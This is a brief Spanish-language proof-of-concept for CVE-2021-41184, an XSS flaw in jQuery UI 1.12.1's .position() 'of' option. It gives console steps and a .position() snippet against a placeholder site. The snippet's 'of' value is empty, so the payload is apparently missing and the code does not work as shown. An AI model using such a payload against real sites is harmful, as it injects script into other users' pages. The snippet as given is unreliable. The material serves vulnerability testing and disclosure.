
Prueba de concepto del exploit para CVE-2021-41184, una vulnerabilidad de cross-site scripting (XSS) en la utilidad .position() de jQuery UI, que apunta a la versión 1.12.1.
Explotación Medium CVE-2021-41184 XSS en la opción of de la utilidad .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Prueba de concepto---------------------------------------------------------------
Abrir la URL
Abrir la inspección
Buscar algún ID en los elementos del sitio
3.1 #ID
Ir a la pestaña de consola
Inyectar el script con el ID seleccionado en el punto 3.1
5.1 Script
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});